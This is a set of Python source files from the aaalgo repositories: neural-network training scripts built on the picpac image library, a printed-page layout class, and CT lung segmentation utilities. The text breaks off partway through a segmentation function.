#### File: aaalgo/nnexp/train-picpac.py ```python import os import sys import logging import numpy as np import cv2 import time import picpac import theano from theano import tensor as T import lasagne from tqdm import tqdm def save_params(model, fn): if isinstance(model, list): param_vals = model else: param_vals = lasagne.layers.get_all_param_values(model) if 'npz' in fn: np.savez(fn, *param_vals) else: with open(fn, 'w') as wr: import pickle pickle.dump(param_vals, wr) def run_epoch (stream, func, maxit, shape): err = None n = 0 #print maxit for it in tqdm(range(maxit)): #stream.get_epoch_iterator(), total=maxit): image, anno, pad = stream.next() e = np.array(func(image, anno)) if err is None: err = e else: err += e n += 1 pass return err / n def train (model, data, out_path, max_epoch, K, fold, batch): verbose = True seed = 1996 tr_stream = picpac.ImageStream(data, batch=batch, K=K, fold=fold, train=True, annotate='image', seed=seed, reshuffle=True) shape = tr_stream.next()[0].shape logging.info('data shape is {}'.format(shape)) import pkgutil loader = pkgutil.get_importer('models') # load network from file in 'models' dir model = loader.find_module(model).load_module(model) input_var = T.tensor4('input') label_var = T.tensor4('label') net, loss, scores = model.network(input_var, label_var, shape) params = lasagne.layers.get_all_params(net, trainable=True) lr = theano.shared(lasagne.utils.floatX(3e-3)) updates = lasagne.updates.adam(loss, params, learning_rate=lr) train_fn = theano.function([input_var, label_var], loss, updates=updates) test_fn = theano.function([input_var, label_var], scores) best = None # (score, epoch, params) for epoch in range(max_epoch): start = time.time() tr_err = run_epoch(tr_stream, train_fn, tr_stream.size() / batch, shape) te_stream = picpac.ImageStream(data, batch=batch, K=K, fold=fold, train=False, annotate='image', seed=seed) te_err = run_epoch(te_stream, test_fn, te_stream.size() / batch, shape) s = te_err[0] if best is None or s < best[0]: best = (s, epoch, [np.copy(p) for p in (lasagne.layers.get_all_param_values(net))]) pass if verbose: print('ep {}/{} - tl {} - vl {} - t {:.3f}s'.format( epoch, max_epoch, tr_err, te_err, time.time()-start)) pass print "save best epoch: {:d}".format(best[1]) save_params(best[2], out_path) pass if __name__ == '__main__': import argparse logging.basicConfig(level=logging.DEBUG) parser = argparse.ArgumentParser(description='import training images & labels') #parser.add_argument('--root', default='hdfs://washtenaw:19000/user/hive/warehouse/wdong_tri.db') parser.add_argument('model', nargs=1) parser.add_argument('data', nargs=1) parser.add_argument('params', nargs=1) parser.add_argument('--epoch', default=300, type=int) parser.add_argument('--fold', default=0, type=int) parser.add_argument('-K', default=5, type=int) parser.add_argument('--batch', default=16, type=int) args = parser.parse_args() np.random.seed(1234) train(args.model[0], args.data[0], args.params[0], args.epoch, args.K, args.fold, args.batch) pass ```
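A sketch of restoring weights written by `save_params` above and running inference. The model-module loading mirrors `train()`; the model name `'unet'`, the input shape, and the `params.npz` filename are assumptions.

```python
import pkgutil
import numpy as np
import theano
from theano import tensor as T
import lasagne

def load_params(path):
    # counterpart of save_params above (npz branch): arrays are stored as arr_0, arr_1, ...
    data = np.load(path)
    return [data['arr_%d' % i] for i in range(len(data.files))]

# rebuild the same network the parameters were trained with
loader = pkgutil.get_importer('models')
model = loader.find_module('unet').load_module('unet')   # hypothetical model name

input_var = T.tensor4('input')
label_var = T.tensor4('label')
net, loss, scores = model.network(input_var, label_var, (16, 3, 256, 256))  # shape is an assumption

lasagne.layers.set_all_param_values(net, load_params('params.npz'))
predict = theano.function([input_var],
                          lasagne.layers.get_output(net, deterministic=True))
```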
{ "source": "aaalgo/paperworks", "score": 3 }
#### File: paperworks/layout/__init__.py ```python
from reportlab.lib.pagesizes import letter, A4, landscape
from reportlab.lib.units import inch
#from params import *


class LetterSizeLandscapeLayout:
    # all orders are x, y, or width, height
    # all boxes are x, y, width, height
    def __init__ (self):
        width, height = landscape(letter)
        margin = 0.25 * inch    # margin
        space = 0.5 * inch
        hspace = 0.25 * inch
        qspace = 0.125 * inch
        self.space = space
        self.hspace = hspace
        self.qspace = qspace
        self.image_margin = qspace
        self.paper_size = width, height
        self.margin = margin
        self.box_height = 0.4 * inch    # sample box or barcode
        self.box_width = 1.5 * inch
        # barcode single bar width
        self.bar_width = 0.02 * inch
        self.anchor_size = 0.4 * inch
        # x0, y0, x1, y1: content box
        x0 = margin
        y0 = margin
        x1 = width - margin
        y1 = height - margin
        self.contentbb = x0, y0, x1 - x0, y1 - y0
        self.imagebb = x0, y0 + self.box_height + qspace, x1 - x0, y1 - y0 - (self.box_height + qspace) * 2
        self.anchors = []
        self.samples = []
        # generate anchors
        r = self.anchor_size / 2
        for X, Y, dx, dy, dir, n in [(x0+r, y0+r, 1, 1, 0, 4), (x1-r, y0+r, -1, 1, 0, 4), (x0+r, y1-r, 1, -1, 0, 4), (x1-r, y1-r, -1, -1, 0, 5)]:
            anchors = []
            for s in range(n):
                x = X + dx * s * (1-dir) * (self.anchor_size + qspace)
                y = Y + dy * s * dir * (self.anchor_size + qspace)
                anchors.append([x, y])
                pass
            # sort by x
            anchors.sort(key=lambda a: a[0])
            self.anchors.extend(anchors)
            pass
        sample_x = x0 + 4 * (self.anchor_size + qspace) + hspace
        self.barcode_x = sample_x + 2 * (self.box_width + hspace) + hspace
        self.barcode_y = y0
        for y, n in [(y0, 2), (y1-self.box_height, 3)]:
            x = sample_x
            for _ in range(n):
                self.samples.append([x, y, self.box_width, self.box_height])
                x += self.box_width + hspace
                pass
            pass
        pass
    pass
```
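A sketch that renders the geometry above to a PDF so the anchor and sample-box positions can be checked visually. Only standard reportlab canvas calls are used; importing the package as `layout` and the output filename are assumptions.

```python
from reportlab.pdfgen import canvas
from layout import LetterSizeLandscapeLayout   # assumes paperworks/ is on PYTHONPATH

lo = LetterSizeLandscapeLayout()
c = canvas.Canvas('layout_preview.pdf', pagesize=lo.paper_size)

r = lo.anchor_size / 2
for x, y in lo.anchors:            # anchors are stored as center points
    c.rect(x - r, y - r, lo.anchor_size, lo.anchor_size, stroke=0, fill=1)

for x, y, w, h in lo.samples:      # samples are stored as x, y, width, height
    c.rect(x, y, w, h, stroke=1, fill=0)

x, y, w, h = lo.imagebb            # image content area
c.rect(x, y, w, h, stroke=1, fill=0)
c.save()
```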
{ "source": "aaalgo/picpac-demos", "score": 2 }
#### File: aaalgo/picpac-demos/cls-train-cifar10-multi.py ```python import os import sys sys.path.append('install/picpac/build/lib.linux-x86_64-%d.%d' % sys.version_info[:2]) os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' import time import threading from tqdm import tqdm import numpy as np import cv2 import tensorflow as tf from tensorflow.contrib import layers import tensorflow.contrib.slim as slim from tensorflow.contrib.slim.nets import resnet_v1 #import resnet_v1 import picpac #import cls_nets as nets print(picpac.__file__) def resnet_v1_18_impl (inputs, num_classes=None, is_training=True, global_pool=True, output_stride=None, reuse=tf.AUTO_REUSE, scope='resnet_v1_18'): resnet_v1_block = resnet_v1.resnet_v1_block blocks = [ resnet_v1_block('block1', base_depth=64, num_units=2, stride=2), resnet_v1_block('block2', base_depth=128, num_units=2, stride=2), resnet_v1_block('block3', base_depth=256, num_units=2, stride=2), resnet_v1_block('block4', base_depth=512, num_units=2, stride=1), ] return resnet_v1.resnet_v1( inputs, blocks, num_classes, is_training, global_pool, output_stride, include_root_block=False, reuse=reuse, scope=scope) def resnet_18 (inputs, is_training, num_classes): logits, _ = resnet_v1_18_impl(inputs, num_classes=num_classes, is_training=is_training) logits = tf.squeeze(logits, [1,2]) # resnet output is (N,1,1,C, remove the return tf.identity(logits, name='logits') flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('db', 'cifar10-train.picpac', 'training db') flags.DEFINE_string('val_db', 'cifar10-test.picpac', 'validation db') flags.DEFINE_integer('classes', 10, 'number of classes') flags.DEFINE_string('mixin', None, 'mix-in training db') flags.DEFINE_integer('channels', 3, '') flags.DEFINE_integer('size', 32, '') flags.DEFINE_integer('batch', 128, 'Batch size. 
') flags.DEFINE_string('net', 'resnet_18', 'architecture') flags.DEFINE_string('model', 'cls_model', 'model directory') flags.DEFINE_string('resume', None, 'resume training from this model') flags.DEFINE_integer('max_to_keep', 100, '') # optimizer settings flags.DEFINE_float('learning_rate', 0.02, 'Initial learning rate.') flags.DEFINE_float('decay_rate', 0.95, '') flags.DEFINE_float('decay_steps', 500, '') # flags.DEFINE_integer('max_steps', 200000, '') flags.DEFINE_integer('ckpt_epochs', 10, '') flags.DEFINE_integer('val_epochs', 2, '') flags.DEFINE_integer('num_gpus', 2, '') def cls_loss (logits, labels): cnt = tf.identity(tf.to_float(tf.shape(logits)[0]), name='ct') #labels = tf.to_int32(labels) logits = tf.reshape(logits, (-1, FLAGS.classes)) labels = tf.reshape(labels, (-1,)) xe = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=labels) xe = tf.reduce_sum(xe, name='xe') with tf.device('/cpu:0'): acc = tf.cast(tf.nn.in_top_k(logits, labels, 1), tf.float32) acc = tf.reduce_sum(acc, name='acc') reg = tf.reduce_sum(tf.losses.get_regularization_losses()) reg = tf.identity(reg, name='re') # optimize for cross-entropy # display cross entropy and accuracy #reg = tf.identity(0, name='reg') loss = tf.identity(xe + reg, name='lo') return loss/cnt, [cnt, xe, acc, reg, loss] def average_gradients(tower_grads): #[ [grad, v] ] average_grads = [] for grad_and_vars in zip(*tower_grads): grads = [] for g, nn in grad_and_vars: #print(nn, g.dtype) expanded_g = tf.expand_dims(g, 0) grads.append(expanded_g) grad = tf.concat(grads, 0) grad = tf.reduce_mean(grad, 0) v = grad_and_vars[0][1] grad_and_var = (grad, v) average_grads.append(grad_and_var) return average_grads def main (_): try: os.makedirs(FLAGS.model) except: pass with tf.device('/cpu:0'): X = tf.placeholder(tf.float32, shape=(None, None, None, FLAGS.channels), name="images") # ground truth labels Y = tf.placeholder(tf.int32, shape=(None, ), name="labels") queue = tf.FIFOQueue(32, (tf.float32, tf.int32)) enc = queue.enqueue((X, Y)) is_training = tf.placeholder(tf.bool, name="is_training") global_step = tf.train.create_global_step() #rate = FLAGS.learning_rate #rate = tf.train.exponential_decay(rate, global_step, FLAGS.decay_steps, FLAGS.decay_rate, staircase=True) #optimizer = tf.train.MomentumOptimizer(learning_rate=rate, momentum=0.9) optimizer = tf.train.AdamOptimizer(0.0001) with slim.arg_scope([slim.conv2d], weights_regularizer=slim.l2_regularizer(2.5e-4)), \ slim.arg_scope([layers.batch_norm], decay=0.9, epsilon=5e-4): # CPU variables #_ = nets.resnet_18(X, is_training, FLAGS.classes) all_grads = [] all_metrics = [] refs = [] for i in range(FLAGS.num_gpus): with tf.device('/gpu:%d' % i): with tf.name_scope('w%d' % i) as scope: decX, decY = queue.dequeue() decX.set_shape(X.get_shape()) decY.set_shape(Y.get_shape()) with tf.variable_scope('netnet'): logits = resnet_18(decX, is_training, FLAGS.classes) #tf.get_variable_scope().reuse_variables() loss, metrics = cls_loss(logits, decY) grads = optimizer.compute_gradients(loss) all_grads.append(grads) all_metrics.append(metrics) refs.append((decX, decY)) pass pass pass grads = average_gradients(all_grads) train_op = optimizer.apply_gradients(grads, global_step=global_step) pass metric_names = [x.name.split('/')[1][:-2] for x in all_metrics[0]] def format_metrics (avg): return ' '.join(['%s=%.3f' % (a, b) for a, b in zip(metric_names, list(avg))]) #global_step = tf.Variable(0, name='global_step', trainable=False) #train_op = optimizer.minimize(loss, global_step=global_step) 
#train_op = slim.learning.create_train_op(loss, optimizer, global_step=global_step) #init = tf.initialize_all_variables() #saver = tf.train.Saver(max_to_keep=FLAGS.max_to_keep) picpac_config = {"db": FLAGS.db, "loop": True, "shuffle": True, "reshuffle": True, "annotate": False, "channels": FLAGS.channels, "stratify": True, "dtype": "float32", "batch": FLAGS.batch//2, "threads": 6, "transforms": [ {"type": "augment.flip", "horizontal": True, "vertical": False}, {"type": "normalize", "mean": 127, "std": 127}, #{"type": "augment.rotate", "min":-10, "max":10}, #{"type": "augment.scale", "min":0.7, "max":1.2}, {"type": "clip", "size": FLAGS.size, "shift": 4}, #{"type": "colorspace", "code": "BGR2HSV", "mul0": 1.0/255}, #{"type": "augment.add", "range":20}, #{"type": "colorspace", "code": "HSV2BGR", "mul1": 255.0}, ] } if not FLAGS.mixin is None: print("mixin support is incomplete in new picpac.") # assert os.path.exists(FLAGS.mixin) # picpac_config['mixin'] = FLAGS.mixin # picpac_config['mixin_group_delta'] = 1 # pass # do we want to apply below to validation images? # load training db assert FLAGS.db and os.path.exists(FLAGS.db) stream = picpac.ImageStream(picpac_config) # load validation db val_stream = None if FLAGS.val_db: val_config = {"db": FLAGS.val_db, "loop": False, "channels": FLAGS.channels, "dtype": "float32", "batch": FLAGS.batch, "transforms": [ {"type": "normalize", "mean": 127, "std": 127}, {"type": "clip", "size": FLAGS.size, 'border_type': 'replicate'}, ] } assert os.path.exists(FLAGS.val_db) val_stream = picpac.ImageStream(val_config) config = tf.ConfigProto() config.gpu_options.allow_growth=True with tf.Session(config=config) as sess, open('cls-train-cifar10.log', 'w') as log: coord = tf.train.Coordinator() sess.run(tf.global_variables_initializer()) sess.run(tf.local_variables_initializer()) def enqueue_sample (): while not coord.should_stop(): meta, images = stream.next() sess.run(enc, feed_dict={X: images, Y: meta.labels.astype(np.int32)}) pass # create encoding threads thread = threading.Thread(target=enqueue_sample, args=()) thread.start() #if FLAGS.resume: # saver.restore(sess, FLAGS.resume) epoch_steps = (stream.size() + FLAGS.batch-1) // FLAGS.batch best = 0 step = 0 epoch = 0 global_start_time = time.time() while step < FLAGS.max_steps: start_time = time.time() avg = np.array([0] * len(metrics), dtype=np.float32) progress = tqdm(range(epoch_steps), leave=False) for _ in progress: mms, _, = sess.run([all_metrics, train_op], feed_dict={is_training:True}) for mm in mms: avg += np.array(mm) progress.set_description(format_metrics(avg/avg[0])) step += 1 pass avg /= avg[0] stop_time = time.time() print('epoch=%d step=%d elapsed=%.4f time=%.4f %s' % (epoch, step, (stop_time - global_start_time), (stop_time - start_time), format_metrics(avg))) epoch += 1 # validation X1, Y1 = refs[0] if epoch and (epoch % FLAGS.val_epochs == 0) and not val_stream is None: lr =0 #lr = sess.run(rate) # evaluation val_stream.reset() avg = np.array([0] * len(metrics), dtype=np.float32) for meta, image in val_stream: feed_dict = {X1: image, Y1: meta.labels, is_training: False} mm = sess.run(all_metrics[0], feed_dict=feed_dict) avg += np.array(mm) pass avg /= avg[0] if avg[2] > best: best = avg[2] print('validation %s' % format_metrics(avg), "best", best, 'lr', lr) log.write('%d\t%s\t%.4f\n' % (epoch, '\t'.join(['%.4f' % x for x in avg]), best)) ''' # model saving if epoch and (epoch % FLAGS.ckpt_epochs == 0): ckpt_path = '%s/%d' % (FLAGS.model, epoch) saver.save(sess, ckpt_path) print('step %d, 
saving to %s.' % (step, ckpt_path)) pass ''' pass pass if __name__ == '__main__': tf.app.run() ``` #### File: aaalgo/picpac-demos/dsb2018-train.py ```python from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import shutil import math from glob import glob import cv2 import random import copy import numpy as np import imageio from skimage import measure import logging import subprocess as sp ROOT = os.path.abspath(os.path.dirname(__file__)) DATA_DIR = os.path.join(ROOT, 'data') class Sample: def __init__ (self, folder): path = None for p in glob(os.path.join(folder, "images/*")): assert ".png" in p assert path is None path = p pass image = cv2.imread(path, -1) #cv2.IMREAD_COLOR) if len(image.shape) == 2: # Sanity check # In case of gray image data in private phase # case this to fail remove the assertion assert False image = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR) else: assert len(image.shape) == 3 if image.shape[2] == 4: assert (image[:, :, 3] == 255).all() image = image[:, :, :3] pass assert image.shape[2] == 3 self.image = image mask_shape = image.shape[:2] masks = [] for path in glob(os.path.join(folder, "masks/*")): assert ".png" in path mask = cv2.imread(path, cv2.IMREAD_GRAYSCALE) assert mask.shape == mask_shape mask = np.clip(mask, 0, 1) masks.append(mask) self.masks = masks pass def mask_sum (self, dilate = None): v = np.zeros(self.image.shape[:2], dtype=np.float) for mask in self.masks: if dilate is None: v += mask elif dilate > 0: v += cv2.dilate(mask, (dilate, dilate)) elif dilate < 0: # !!! check v += cv2.erode(mask, (-dilate, -dilate)) return v try: os.remove('dsb2018.db') except: pass db = picpac.Writer('dsb2018.db') logging.warn("Importing images into PicPac database...") for folder in glob(os.path.join(DATA_DIR, "stage1_train/*")): print(folder) sample = Sample(folder) sample.stat() image_buffer = cv2.imencode('.png', sample.image)[1].tostring() mask = np.clip(sample.mask_sum(), 0, 1).astype(np.uint8) mask_buffer = cv2.imencode('.png', mask)[1].tostring() db.append(image_buffer, mask_buffer) del db #print(folder) sp.check_call('./fcn-train.py --db dsb2018.db --model dsb2018.model --annotate image') ``` #### File: aaalgo/picpac-demos/fcn-train.py ```python from __future__ import absolute_import, division, print_function import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' import time from tqdm import tqdm import numpy as np import cv2 import tensorflow as tf import picpac import fcn_nets as nets flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('db', 'db', 'training db') flags.DEFINE_string('val_db', None, 'validation db') flags.DEFINE_integer('classes', 2, 'number of classes') flags.DEFINE_string('mixin', None, 'mix-in training db') flags.DEFINE_string('annotate', 'json', 'json or image') flags.DEFINE_integer('channels', 3, '') flags.DEFINE_integer('max_size', None, '') flags.DEFINE_string('net', 'resnet_v1_50', 'architecture') flags.DEFINE_string('model', 'fcn_model', 'model directory') flags.DEFINE_string('resume', None, 'resume training from this model') flags.DEFINE_integer('max_to_keep', 100, '') # optimizer settings flags.DEFINE_float('learning_rate', 0.0001, 'Initial learning rate.') flags.DEFINE_float('decay_rate', 0.9, '') flags.DEFINE_float('decay_steps', 10000, '') # flags.DEFINE_integer('max_steps', 200000, '') flags.DEFINE_integer('epoch_steps', 100, '') flags.DEFINE_integer('ckpt_epochs', 100, '') flags.DEFINE_integer('val_epochs', 100, '') def fcn_loss (logits, labels): labels = 
tf.to_int32(labels) logits = tf.reshape(logits, (-1, FLAGS.classes)) labels = tf.reshape(labels, (-1,)) xe = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=labels) xe = tf.reduce_mean(xe, name='xe') acc = tf.cast(tf.nn.in_top_k(logits, labels, 1), tf.float32) acc = tf.reduce_mean(acc, name='acc') # optimize for cross-entropy # display cross entropy and accuracy return xe, [xe, acc] def main (_): try: os.makedirs(FLAGS.model) except: pass X = tf.placeholder(tf.float32, shape=(None, None, None, FLAGS.channels), name="images") # ground truth labels Y = tf.placeholder(tf.float32, shape=(None, None, None, 1), name="labels") is_training = tf.placeholder(tf.bool, name="is_training") # load network logits, stride = getattr(nets, FLAGS.net)(X, is_training, FLAGS.classes) loss, metrics = fcn_loss(logits, Y) metric_names = [x.name[:-2] for x in metrics] global_step = tf.Variable(0, name='global_step', trainable=False) rate = FLAGS.learning_rate rate = tf.train.exponential_decay(rate, global_step, FLAGS.decay_steps, FLAGS.decay_rate, staircase=True) optimizer = tf.train.AdamOptimizer(rate) train_op = optimizer.minimize(loss, global_step=global_step) init = tf.global_variables_initializer() saver = tf.train.Saver(max_to_keep=FLAGS.max_to_keep) picpac_config = dict(seed=2017, cache=True, # set to False for large datasets shuffle=True, reshuffle=True, batch=1, round_div=stride, annotate=FLAGS.annotate, # json by default channels=FLAGS.channels, # 3 by default stratify=True, pert_colorspace='SAME', # do not change colorspace # which typically means BGR # or HSV or Lab pert_color1=20, pert_color2=20, pert_color3=20, pert_angle=20, pert_min_scale=0.9, pert_max_scale=1.2, pert_hflip=True, pert_vflip=True, channel_first=False # this is tensorflow specific # Caffe's dimension order is different. 
) if not FLAGS.mixin is None: assert os.path.exists(FLAGS.mixin) picpac_config['mixin'] = FLAGS.mixin picpac_config['mixin_group_delta'] = 1 pass if not FLAGS.max_size is None: config['max_size'] = FLAGS.max_size # load training db assert FLAGS.db and os.path.exists(FLAGS.db) stream = picpac.ImageStream(FLAGS.db, perturb=True, loop=True, **picpac_config) # load validation db val_stream = None if FLAGS.val_db: assert os.path.exists(FLAGS.val_db) val_stream = picpac.ImageStream(FLAGS.val_db, perturb=False, loop=False, **picpac_config) config = tf.ConfigProto() config.gpu_options.allow_growth=True with tf.Session(config=config) as sess: sess.run(init) if FLAGS.resume: saver.restore(sess, FLAGS.resume) step = 0 epoch = 0 global_start_time = time.time() while step < FLAGS.max_steps: start_time = time.time() avg = np.array([0] * len(metrics), dtype=np.float32) for _ in tqdm(range(FLAGS.epoch_steps), leave=False): images, labels, _ = stream.next() feed_dict = {X: images, Y: labels, is_training: True} mm, _, = sess.run([metrics, train_op, ], feed_dict=feed_dict) avg += np.array(mm) pass step += FLAGS.epoch_steps avg /= FLAGS.epoch_steps stop_time = time.time() txt = ', '.join(['%s=%.4f' % (a, b) for a, b in zip(metric_names, list(avg))]) print('step %d: elapsed=%.4f time=%.4f, %s' % (step, (stop_time - global_start_time), (stop_time - start_time), txt)) epoch += 1 # validation if epoch and (epoch % FLAGS.val_epochs == 0) and not val_stream is None: # evaluation val_stream.reset() avg = np.array([0] * len(metrics), dtype=np.float32) C = 0 for images, labels, _ in val_stream: feed_dict = {X: images, Y: labels, is_training: False} mm = sess.run(metrics, feed_dict=feed_dict) avg += np.array(mm) C += 1 pass avg /= C txt = ', '.join(['%s=%.4f' % (a, b) for a, b in zip(metric_names, list(avg))]) print('step %d, validation: %s' % (step, txt)) # model saving if epoch and (epoch % FLAGS.ckpt_epochs == 0): ckpt_path = '%s/%d' % (FLAGS.model, step) saver.save(sess, ckpt_path) print('step %d, saving to %s.' % (step, ckpt_path)) pass pass pass if __name__ == '__main__': tf.app.run() ```
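The `average_gradients()` helper in `cls-train-cifar10-multi.py` earlier in this record is the core of the multi-GPU setup: it takes one gradient list per tower and returns the element-wise mean for each variable. A plain-NumPy sketch of the same reduction (the tower data below is made up for illustration, no TensorFlow involved):
```python
import numpy as np

def average_gradients_np(tower_grads):
    # tower_grads[i] is the list of (grad, var) pairs produced by tower i
    averaged = []
    for grad_and_vars in zip(*tower_grads):
        grads = np.stack([g for g, _ in grad_and_vars], axis=0)
        averaged.append((grads.mean(axis=0), grad_and_vars[0][1]))
    return averaged

tower0 = [(np.array([1.0, 2.0]), 'w'), (np.array([0.5]), 'b')]
tower1 = [(np.array([3.0, 4.0]), 'w'), (np.array([1.5]), 'b')]
print(average_gradients_np([tower0, tower1]))
# [(array([2., 3.]), 'w'), (array([1.]), 'b')]
```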
{ "source": "aaalgo/plumo", "score": 2 }
#### File: plumo/src/adsb3.py ```python from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import sys sys.path.append('build/lib.linux-x86_64-2.7') import shutil import math from glob import glob import cv2 import csv import random from PIL import Image, ImageDraw import dicom import copy import numpy as np import SimpleITK as itk from skimage import measure import logging import cPickle as pickle import plumo # configuration options DICOM_STRICT = False SPACING = 0.8 GAP = 5 FAST = 400 if 'SPACING' in os.environ: SPACING = float(os.environ['SPACING']) print('OVERRIDING SPACING = %f' % SPACING) if 'GAP' in os.environ: GAP = int(os.environ['GAP']) print('OVERRIDING GAP = %d' % GAP) ROOT = os.path.abspath(os.path.dirname(__file__)) DATA_DIR = os.path.join(ROOT, 'data', 'adsb3') # parse label file, return a list of (id, label) # if gs is True, labels are int # otherwise, labels are float def load_meta (path, gs=True): all = [] with open(path, 'r') as f: header = f.next() # skip one line assert header.strip() == 'id,cancer' for l in f: ID, label = l.strip().split(',') if gs: label = int(label) else: label = float(label) all.append((ID, label)) pass pass return all # write meta for verification def dump_meta (path, meta): with open(path, 'w') as f: f.write('id,cancer\n') for ID, label in meta: f.write('%s,%s\n' % (ID, str(label))) pass pass STAGE1_TRAIN = load_meta(os.path.join(DATA_DIR, 'stage1_labels.csv')) STAGE1_PUBLIC = load_meta(os.path.join(DATA_DIR, 'stage1_public.csv')) STAGE2_PUBLIC = load_meta(os.path.join(DATA_DIR, 'stage2_public.csv')) STAGE2_PRIVATE = load_meta(os.path.join(DATA_DIR, 'stage2_private.csv')) ALL_CASES = STAGE1_TRAIN + STAGE1_PUBLIC + STAGE2_PUBLIC + STAGE2_PRIVATE # All DiCOMs of a UID, organized class Case (plumo.DicomVolume): def __init__ (self, uid, regroup = True): path = os.path.join(DATA_DIR, 'dicom', uid) plumo.DicomVolume.__init__(self, path) self.uid = uid self.path = path pass pass def save_mask (path, mask): shape = np.array(list(mask.shape), dtype=np.uint32) total = mask.size totalx = (total +7 )// 8 * 8 if totalx == total: padded = mask else: padded = np.zeros((totalx,), dtype=np.uint8) padded[:total] = np.reshape(mask, (total,)) pass padded = np.reshape(padded, (totalx//8, 8)) #print padded.shape packed = np.packbits(padded) #print packed.shape np.savez_compressed(path, shape, packed) pass def load_mask (path): import sys saved = np.load(path) shape = saved['arr_0'] D, H, W = shape size = D * H * W packed = saved['arr_1'] padded = np.unpackbits(packed) binary = padded[:size] return np.reshape(binary, [D, H, W]) def load_8bit_lungs_noseg (uid): case = Case(uid) case.normalize_8bit() return case def load_16bit_lungs_noseg (uid): case = Case(uid) case.normalize_16bit() return case def load_lungs_mask (uid): cache = os.path.join('maskcache/mask-v2/%s.npz' % case.uid) binary = None if os.path.exists(cache) and os.path.getsize(cache) > 0: # load cache binary = load_mask(cache) assert not binary is None if binary is None: case = load_case(uid) case.normalizeHU() binary = segment_lung_axial_v2(case.images) #, th=200.85) save_mask(cache, binary) pass return binary def load_fts (path): with open(path, 'rb') as f: return pickle.load(f) pass def patch_clip_range (x, tx, wx, X): if x < 0: # wx += x tx -= x x = 0 if x + wx > X: d = x + wx - X wx -= d pass return x, tx, wx def extract_patch_3c (images, z, y, x, size): assert len(images.shape) == 3 _, Y, X = images.shape z = int(round(z)) y = 
int(round(y)) x = int(round(x)) image = get3c(images, z) if image is None: return None ty = 0 tx = 0 y -= size//2 x -= size//2 wy = size wx = size #print y, ty, wy, x, tx, wx y, ty, wy = patch_clip_range(y, ty, wy, Y) x, tx, wx = patch_clip_range(x, tx, wx, X) # now do overlap patch = np.zeros((size, size, 3), dtype=image.dtype) #print y, ty, wy, x, tx, wx patch[ty:(ty+wy),tx:(tx+wx),:] = image[y:(y+wy),x:(x+wx),:] return patch def try_mkdir (path): try: os.makedirs(path) except: pass def try_remove (path): try: os.remove(path) except: shutil.rmtree(path, ignore_errors=True) pass if __name__ == '__main__': #dump_meta('a', STAGE1.train) #dump_meta('b', STAGE1.test) pass ``` #### File: plumo/src/mesh.py ```python import sys import time import numpy as np import cv2 import skimage from skimage import measure from scipy.ndimage.morphology import grey_dilation, binary_dilation, binary_fill_holes #from skimage import regionprops import scipy from adsb3 import * def pad (images, padding=2, dtype=None): Z, Y, X = images.shape if dtype is None: dtype = images.dtype out = np.zeros((Z+padding*2, Y+padding*2, X+padding*2), dtype=dtype) out[padding:(Z+padding),padding:(Y+padding),padding:(X+padding)] = images return out def segment_body (image, smooth=1, th=-300): blur = scipy.ndimage.filters.gaussian_filter(image, smooth, mode='constant') binary = np.array(blur < th, dtype=np.uint8) # body is a rough region covering human body body = np.zeros_like(binary) for i, sl in enumerate(binary): #H, W = sl.shape ll = measure.label(sl, background=1) # connected components # biggest CC should be body pp = measure.regionprops(ll) boxes = [(x.area, x.bbox, x.filled_image) for x in pp if x.label != 0] # label 0 is air boxes = sorted(boxes, key = lambda x: -x[0]) if len(boxes) == 0: continue y0, x0, y1, x1 = boxes[0][1] body[i,y0:y1,x0:x1] = boxes[0][2] pass return body, None def fill_convex (image): H, W = image.shape padded = np.zeros((H+20, W+20), dtype=np.uint8) padded[10:(10+H),10:(10+W)] = image contours = measure.find_contours(padded, 0.5) if len(contours) == 0: return image if len(contours) == 1: contour = contours[0] else: contour = np.vstack(contours) cc = np.zeros_like(contour, dtype=np.int32) cc[:,0] = contour[:, 1] cc[:,1] = contour[:, 0] hull = cv2.convexHull(cc) contour = hull.reshape((1, -1, 2)) cv2.fillPoly(padded, contour, 1) return padded[10:(10+H),10:(10+W)] def segment_lung (image, smooth=1, th=-300): padding_value = np.min(image) if padding_value < -1010: padding = [image == padding_value] else: padding = None imagex = image if padding: imagex = np.copy(image) imagex[padding] = 0 blur = scipy.ndimage.filters.gaussian_filter(imagex, smooth, mode='constant') if padding: blur[padding] = padding_value binary = np.array(blur < th, dtype=np.uint8) # body is a rough region covering human body body = np.zeros_like(binary) for i, sl in enumerate(binary): #H, W = sl.shape ll = measure.label(sl, background=1) # connected components # biggest CC should be body pp = measure.regionprops(ll) boxes = [(x.area, x.bbox, x.filled_image) for x in pp if x.label != 0] # label 0 is air boxes = sorted(boxes, key = lambda x: -x[0]) if len(boxes) == 0: print 'no body detected' continue y0, x0, y1, x1 = boxes[0][1] body[i,y0:y1,x0:x1] = fill_convex(boxes[0][2]) pass binary *= body if False: padding = np.min(image) if padding < -1010: binary[image == padding] = 0 # 0: body # 1: air & lung labels = measure.label(binary, background=1) # set air (same cc as corners) -> body bg_labels = set() # 8 corders of the image for z in 
[0, -1]: for y in [0, -1]: for x in [0, -1]: bg_labels.add(labels[z, y, x]) print bg_labels bg_labels = list(bg_labels) for bg_label in bg_labels: binary[bg_label == labels] = 0 pass # now binary: # 0: non-lung & body tissue in lung & air # 1: lung & holes in body #inside = np.copy(binary) # now binary: # 0: non-lung & body tissue in lung # 1: lung & holes in body binary = np.swapaxes(binary, 0, 1) for i, sl in enumerate(binary): #H, W = sl.shape ll = measure.label(sl, background=1) # connected components # biggest CC should be body vv, cc = np.unique(ll, return_counts=True) cc[0] = 0 assert len(vv) > 0 body_ll = vv[np.argmax(cc)] binary[i][ll != body_ll] = 1 pass binary = np.swapaxes(binary, 0, 1) if padding: binary[padding] = 0 binary *= body # binary 0: body # 1: - anything inside lung # - holes in body # - possibly image corners # # inside 0: non-lung & air # body tissue in lung # 1: lung # set corner again labels = measure.label(binary, background=0) bg_labels = set([0]) for z in [0, -1]: for y in [0, -1]: for x in [0, -1]: bg_labels.add(labels[z, y, x]) #print 'bg', bg_labels val_counts = zip(*np.unique(labels, return_counts=True)) val_counts = [x for x in val_counts if (not x[0] in bg_labels) and (x[1] >= 